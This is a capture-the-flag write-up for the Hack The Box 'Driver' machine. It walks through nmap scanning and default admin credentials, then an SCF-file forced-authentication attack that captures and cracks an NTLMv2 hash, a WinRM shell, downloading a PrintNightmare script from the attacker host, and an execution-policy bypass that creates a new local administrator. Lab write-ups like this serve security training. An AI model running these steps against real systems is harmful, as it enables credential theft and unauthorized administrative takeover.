HTB - Driver

13 minute read

Hack The Box - Driver

Nmap Scanning

Lets scan the host with nmap to gather the information about the running services,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV 10.10.11.106 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 08:16 EST
Nmap scan report for 10.10.11.106
Host is up (0.32s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-02-22T20:20:52
|_  start_date: 2022-02-22T20:19:24
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 7h03m58s, deviation: 0s, median: 7h03m57s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.48 seconds

Seems like we have 3 open ports

Enumeration

Lets go to the web service running on port 80

This server is running on Microsoft-IIS/10.0 and also we could not find any exploits for this version by searching exploits on searchsploit

While loading this page, it prompts for authentication

Image

By trying the credentials admin:admin, we could login easily

Its just a default guessable username and password, it works since it is an easy level machine

Image

After searching all the tabs, this seems something relevant

Image

This file upload does not blacklist the extension, this made me to try php web reverse shell but no luck

Tried querying the URL parameter, it looks like a rabbit hole

Since, we are using SMB service, its better to test for Relay Attacks

Lets run a nmap nse script to check the SMB is vulnerable to relay attack or not

┌──(kaliaidenpearce369)-[~]
└─$ sudo nmap -p 445 10.10.11.106 -sS --script smb-security-mode.nse 
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 09:58 EST
Nmap scan report for 10.10.11.106
Host is up (0.31s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap done: 1 IP address (1 host up) scanned in 3.16 seconds

Here the message signing is disabled, which is set by default

This is a common attack vector when it comes to Enterprise level security, where attackers aim SMB shares to grab the NTLMv2 hashes and relay it to other servers for malicious activities

By enabling SMB signing, each and every packet is digitally signed to ensure the authenticity and integrity and it prevents MITM attacks with responder and relayers

Gaining access

We found a possible good attack vector to gain NTLMv2 hash, but we need a medium to trigger our attack vector

To get our NTLMv2 hash, we need to make the Windows machine to probe for data from shares so that we can perform MITM attack with responder to gain the user’s NTLMv2 hash

Firing up responder,

┌──(root💀aidenpearce369)-[/home/kali]
└─# responder -rfw -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.7.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
    Fingerprint hosts          [ON]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.3]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-6PMAFV4ZDLE]
    Responder Domain Name      [ZRTF.LOCAL]
    Responder DCE-RPC Port     [45028]

[+] Listening for events...                                            

Now, we have set up our responder and it is actively listening the network traffic

The next step we have to do is, force authenticate the end user to trigger the SMB probe call to our responder

These are some good Forced Authentication Techniques

For more information on SCF file attack via SMB

Lets create a scf file to trigger the MITM request from victim

The Shell Command File will have a UNC path, where we will be providing a fake/real SMB share path to trigger the victim machine to make a request and make our responder to ask its NTLMv2 hash

Other attack vectors for forced authentication requires user interaction to gain access, but here the SCF file will be executed automatically whenever the file is browsed through desktop process

[Shell]
Command=2
IconFile=\\10.10.14.3\dummyshare\dummyfile
[Taskbar]
Command=ToggleDesktop

Here we have used a fake SMB path, when the SCF gets triggered, it will pass the NTLMv2 hash to responder

After uploading it into the web interface,

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:b530df1f315da28c:EB7627FD85DDE09CBBAC2DBFD90D2CBF:0101000000000000000676F7E927D80181B1967E49193D590000000002000800460034004C00520001001E00570049004E002D00560030004600350059004C005900430034005000490004003400570049004E002D00560030004600350059004C00590043003400500049002E00460034004C0052002E004C004F00430041004C0003001400460034004C0052002E004C004F00430041004C0005001400460034004C0052002E004C004F00430041004C0007000800000676F7E927D80106000400020000000800300030000000000000000000000000200000BFE945171315DD47E04093ECBB9DE8369D3616D5AAB51056ADE3C58DDB972FF80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000       
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony

...

So we got a NTLMv2 hash for a user named tony on DRIVER machine

If we try SMB relaying attack it would fail,

┌──(root💀aidenpearce369)-[/home/kali]
└─# smbrelayx.py -h 10.10.11.106 -c whoami
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Running in relay mode
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.11.106, attacking target 10.10.11.106
[-] Authenticating against 10.10.11.106 as DRIVER\tony FAILED

Instead of SMB relay attack, we could crack the NTLMv2 hash with john

Lets crack this hash

──(kaliaidenpearce369)-[~/HTB/Driver]
└─$ john hash.txt -w=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)
                                                                       
┌──(kaliaidenpearce369)-[~/HTB/Driver]
└─$ john hash.txt --show                              
tony:liltony:DRIVER:e31d5fd2827c0dab:FC4F840D0A31C7D80B873C058C742336:010100000000000000DEE093D327D801BCC172CC7A390F37000000000200080052004F005500390001001E00570049004E002D004500310053003500490045005400430045003600470004003400570049004E002D00450031005300350049004500540043004500360047002E0052004F00550039002E004C004F00430041004C000300140052004F00550039002E004C004F00430041004C000500140052004F00550039002E004C004F00430041004C000700080000DEE093D327D80106000400020000000800300030000000000000000000000000200000BFE945171315DD47E04093ECBB9DE8369D3616D5AAB51056ADE3C58DDB972FF80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000

1 password hash cracked, 0 left

Now, we got the plain text password from the hash and lets use it to authenticate into the machine with username

Lets use Evil-WinRM which is an alternate for PS-Remoting in Linux,

To install it,

┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# gem install evil-winrm

Authenticating as tony on DRIVER machine

┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# evil-winrm -i 10.10.11.106 -u tony -p liltony 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> hostname
DRIVER

We can use this docker container as an alternative for Evil-WinRM

Privilege Escalation

We have gained access on this machine, the next thing we can do is check for privileges

*Evil-WinRM* PS C:\Users\tony\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
*Evil-WinRM* PS C:\Users\tony\Documents> 

We have to escalate our privileges, lets try WinPEAS

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-WebRequest "http://10.10.14.3:8000/winPEASany.exe" -OutFile winpeas.exe
*Evil-WinRM* PS C:\Users\tony\Documents> dir


    Directory: C:\Users\tony\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/22/2022   3:46 PM        1931776 winpeas.exe

No luck running WinPEAS

Lets look for running process to get some idea

*Evil-WinRM* PS C:\Users\tony\Documents> ps

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
     40       4     1904       1392 ...67     2.09   1500 cmd
    113      10    10440       6776 ...45     4.20   2524 conhost
    309      13     1176       4184 ...02             344 csrss
    259      18     1180       4076 ...08             460 csrss
    203      13     3364      12076 ...02            2260 dllhost
    334      26    31308      49976 ...99             808 dwm
    500      27     8472      30756 ...32     0.27    356 explorer
   1398      59    16848      62180 ...66    28.45   2888 explorer
    493      27     8584      30688 ...31     0.34   3652 explorer
    516      34    10196      35340 ...44     0.22   5092 explorer
      0       0        0          4     0               0 Idle
   1016      23     5356      15212 ...01             576 lsass
    173      13     2316       8836 ...95            2476 msdtc
    474      38    15100      43120   303     3.39   4668 OneDrive
     55       6      724       3324 ...65     0.02    764 PING
    299      18     6604      23368 ...80     1.16   3080 RuntimeBroker
    683      45    23012      27716 ...32            2680 SearchIndexer
    745      47    30208      70740 33076     0.78   3564 SearchUI
    183      12     2600      10420 ...02            1344 sedsvc
    245      10     2692       6492 ...74             568 services
    642      31    13956      46624   252     0.67   3444 ShellExperienceHost
    346      15     3484      17816 ...47     1.20   3064 sihost
     49       3      336       1168 ...56             268 smss
    381      22     5216      13912 ...13            1208 spoolsv
    533      20     4972      17052 ...17             660 svchost
    509      17     3328       8924 ...90             712 svchost
    649      48     7820      20472 ...26             752 svchost
   1330      54    15968      39004 ...41             832 svchost
    594      27    11144      18484 ...36             872 svchost
    211      16     2004       8352 ...96             936 svchost
    423      21     4776      17740 ...46             944 svchost
    765      27     6116      14196 ...39             992 svchost
    489      42    13648      24380 ...63            1376 svchost
    127      11     3048       9280 ...97            1568 svchost
    183      15     3408       9916 ...04            1624 svchost
    185      15     3504      15196 ...57            1632 svchost
    295      20     5224      19332 ...14            1640 svchost
    172      12     2048      12292 ...26     0.05   2088 svchost
    116       9     1276       6136 ...77            3004 svchost
     99       7     1156       5976 ...87            4228 svchost
    844       0      120        140     3               4 System
    273      28     4476      13640 ...16     0.61   2000 taskhostw
    138      11     2660      10432 ...22            1736 VGAuthService
    100       8     1368       6048 ...28            1324 vm3dservice
    108       7     1352       5540 ...06            1668 vm3dservice
    333      23     9432      21784 ...52            1660 vmtoolsd
    211      18     4904      15100 ...67     1.84   4632 vmtoolsd
     87       9      960       4732 ...74             452 wininit
    182       9     1808       8788 ...22             504 winlogon
    325      19     9120      19148 ...96            2392 WmiPrvSE
   2736      36    81356     103440 ...73     2.91   4808 wsmprovhost
    219      10     1540       7152 ...92            1064 WUDFHost

*Evil-WinRM* PS C:\Users\tony\Documents> 

Seems like we are running spoolsv service, which has Print Nightmare Exploit

*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Service -Name Spooler

Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

So we are definitely running a Print Spooler service

Lets use this CVE-2021-1675 PowerShell script to perform LPE

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-WebRequest "http://10.10.14.3:8000/CVE-2021-1675.ps1" -OutFile lpe.ps1*Evil-WinRM* PS C:\Users\tony\Documents> . .\lpe.ps1
File C:\Users\tony\Documents\lpe.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .\lpe.ps1
+   ~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess

Bypassing the execution policy to run PowerShell scripts and using this LPE exploit to add our new user into localgroup of Administrators

*Evil-WinRM* PS C:\Users\tony\Documents> $env:PSExecutionPolicyPreference="bypass"
*Evil-WinRM* PS C:\Users\tony\Documents> . .\lpe.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -DriverName "DummyBhava" -NewUser "aidenpearce369" -NewPassword "thenameisMonish"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user aidenpearce369 as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            aidenpearce369           DefaultAccount
Guest                    tony
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
aidenpearce369
The command completed successfully.

Post Exploitation

We have created a new user and also added it into the localgroup of Administrators

Now lets login as our new admin user,

┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# evil-winrm -i 10.10.11.106 -u aidenpearce369 -p thenameisMonish

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
driver\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
DRIVER
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= =======
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Enabled
SeSecurityPrivilege             Manage auditing and security log          Enabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Enabled
SeLoadDriverPrivilege           Load and unload device drivers            Enabled
SeSystemProfilePrivilege        Profile system performance                Enabled
SeSystemtimePrivilege           Change the system time                    Enabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled
SeCreatePagefilePrivilege       Create a pagefile                         Enabled
SeBackupPrivilege               Back up files and directories             Enabled
SeRestorePrivilege              Restore files and directories             Enabled
SeShutdownPrivilege             Shut down the system                      Enabled
SeDebugPrivilege                Debug programs                            Enabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Enabled
SeUndockPrivilege               Remove computer from docking station      Enabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled
SeTimeZonePrivilege             Change the time zone                      Enabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> 

Extracting secrets from this machine,

*Evil-WinRM* PS C:\Users\tony\Desktop> dir


    Directory: C:\Users\tony\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/22/2022  12:19 PM             34 user.txt


*Evil-WinRM* PS C:\Users\tony\Desktop> more user.txt
<USER FLAG>

*Evil-WinRM* PS C:\Users\tony\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/22/2022  12:19 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>